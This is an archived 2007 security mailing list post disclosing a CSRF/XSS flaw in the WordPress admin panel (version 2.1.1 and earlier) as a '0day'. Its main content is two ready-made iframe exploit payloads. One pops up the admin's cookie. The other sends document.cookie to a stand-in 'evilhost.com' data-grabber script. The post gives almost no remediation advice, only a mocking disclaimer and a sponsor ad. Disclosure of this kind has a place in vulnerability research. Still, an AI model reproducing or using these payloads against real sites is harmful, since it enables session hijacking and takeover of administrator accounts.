WebApp Sec mailing list archives
WordPress AdminPanel CSRF/XSS - 0day
From: SaMuschie <samuschie () yahoo de>
Date: Mon, 26 Feb 2007 21:50:57 +0100 (CET)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +---------------------------------------------------------------------------+ | SaMuschie Research Labs proudly presents . . . | +---------------------------------------------------------------------------+ | Application: wordpress Version: <= 2.1.1 | | Vuln./Exploit Type: AdminPanel CSRF/XSS Status: 0day | +---------------------------------------------------------------------------+ | Discovered by: Samenspender Released: 20070226 | | SaMuschie Release Number: 1 | +---------------------------------------------------------------------------+ Exploit: Cookie in an Alert Box: <iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe> Cookie send to an Evil Host: <iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe> +---------------------------------------------------------------------------+ | Lameness Disclaimer | +---------------------------------------------------------------------------+ | SaMuschie Research Labs was found to publish vulnerabilities within well | | known software products, which are easy to discover and exploit. | | | | SaMuschie researchers just spend a minimum of time and knowledge for each | | vulnerability. Hence readers of this advisory are requested not to ask | | any questions to the researchers.... they don't know the answer ;) | +---------------------------------------------------------------------------+ +---------------------------------------------------------------------------+ | EOF | +---------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF4xadMFgfGpQK8VERAkO5AJ9V8uosk2DATRTARHDhPxNe+RHirgCeKQ0h aFgDpHnxPP+/4Ot5bLBZy9Q= =/gS4 -----END PGP SIGNATURE----- ___________________________________________________________ Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de ------------------------------------------------------------------------- Sponsored by: Watchfire The Twelve Most Common Application-level Hack Attacks Hackers continue to add billions to the cost of doing business online despite security executives' efforts to prevent malicious attacks. This whitepaper identifies the most common methods of attacks that we have seen, and outlines a guideline for developing secure web applications. Download today! https://www.watchfire.com/securearea/whitepapers.aspx?id=701500000008fHe --------------------------------------------------------------------------
Current thread:
- WordPress AdminPanel CSRF/XSS - 0day SaMuschie (Feb 26)